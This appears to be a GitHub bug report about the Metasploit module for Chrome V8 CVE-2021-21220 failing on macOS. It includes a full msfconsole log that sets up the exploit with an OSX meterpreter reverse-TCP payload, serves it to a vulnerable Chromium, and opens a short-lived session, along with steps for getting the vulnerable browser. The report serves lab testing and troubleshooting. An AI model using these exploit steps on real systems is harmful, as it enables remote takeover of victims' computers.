You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
I am not sure if I am doing something wrong here but I am encountering the below error when, I am testing for "cve_2021_21220_v8_insufficient_validation" against macOS with a vulnerable browser, the session dies after sometime where the browser keeps loading the exploit URL. Although, this exploit works perfect on Windows but I got some issue for macOS.
System version: macOS 14.6.1 (23G93) Chromium: Version 90.0.4430.0 (Developer Build) (x86_64)
Configuration: (MSF is running on Kali VM and network is on NAT, base is macOS which has Chrome running.)
msf6 > search cve_2021_21220
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation 2021-04-13 manual No Google Chrome versions before 89.0.4389.128 V8 XOR Typer Out-Of-Bounds Access RCE
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation
msf6 > use 0
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > set TArGET 2
TArGET => 2
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/shell_bind_aws_ssm normal No Command Shell, Bind SSM (via AWS API)
2 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
3 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
4 payload/generic/ssh/interact normal No Interact with Established SSH Connection
5 payload/osx/x64/dupandexecve/bind_tcp normal No OS X dup2 Command Shell, Bind TCP Stager
6 payload/osx/x64/dupandexecve/reverse_tcp normal No OS X dup2 Command Shell, Reverse TCP Stager
7 payload/osx/x64/dupandexecve/reverse_tcp_uuid normal No OS X dup2 Command Shell, Reverse TCP Stager with UUID Support (OSX x64)
8 payload/osx/x64/exec normal No OS X x64 Execute Command
9 payload/osx/x64/meterpreter/bind_tcp normal No OSX Meterpreter, Bind TCP Stager
10 payload/osx/x64/meterpreter/reverse_tcp normal No OSX Meterpreter, Reverse TCP Stager
11 payload/osx/x64/meterpreter/reverse_tcp_uuid normal No OSX Meterpreter, Reverse TCP Stager with UUID Support (OSX x64)
12 payload/osx/x64/say normal No OS X x64 say Shellcode
13 payload/osx/x64/shell_bind_tcp normal No OS X x64 Shell Bind TCP
14 payload/osx/x64/shell_reverse_tcp normal No OS X x64 Shell Reverse TCP
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > set PAYLOAD 11
PAYLOAD => osx/x64/meterpreter/reverse_tcp_uuid
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > set LHOST 172.16.30.21
LHOST => 172.16.30.21
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > set URIPATH /doodoo
URIPATH => /doodoo
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > options
Module options (exploit/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH /doodoo no The URI to use for this exploit (default is random)
Payload options (osx/x64/meterpreter/reverse_tcp_uuid):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.16.30.21 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
2 macOS - Google Chrome < 89.0.4389.128/90.0.4430.72 (64 bit)
View the full module info with the info, or info -d command.
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 172.16.30.21:4444
[*] Using URL: http://172.16.30.21:8080/doodoo
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > [*] Server started.
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) >
[*] 172.16.30.1 chrome_cve_2021_21220_v8_insufficient_validation - Sending /doodoo to Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.0 Safari/537.36
[*] Transmitting first stager...(214 bytes)
[*] Transmitting second stager...(49152 bytes)
[*] Sending stage (810648 bytes) to 172.16.30.1
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
[-] The "sysinfo" command requires the "stdapi" extension to be loaded (run: `load stdapi`)
meterpreter > load stdapi
[-] The "load" command is not supported by this Meterpreter type (x64/osx)
meterpreter >
[-] Meterpreter session 1 is not valid and will be closed
[*] 172.16.30.1 - Meterpreter session 1 closed.
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > version
Framework: 6.3.27-dev
Console : 6.3.27-dev
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) >
I am not sure if I am doing something wrong here but I am encountering the below error when, I am testing for "
cve_2021_21220_v8_insufficient_validation
" against macOS with a vulnerable browser, the session dies after sometime where the browser keeps loading the exploit URL. Although, this exploit works perfect on Windows but I got some issue for macOS.System version: macOS 14.6.1 (23G93)
Chromium: Version 90.0.4430.0 (Developer Build) (x86_64)
Configuration: (MSF is running on Kali VM and network is on NAT, base is macOS which has Chrome running.)
Running Chrome:
Downloading Vuln Chromium:
Navigate to, https://vikyd.github.io/download-chromium-history-version/#/ select Mac and put in the version i.e.,
90.0.4430.00
it should make a redirect to Chromium.The text was updated successfully, but these errors were encountered: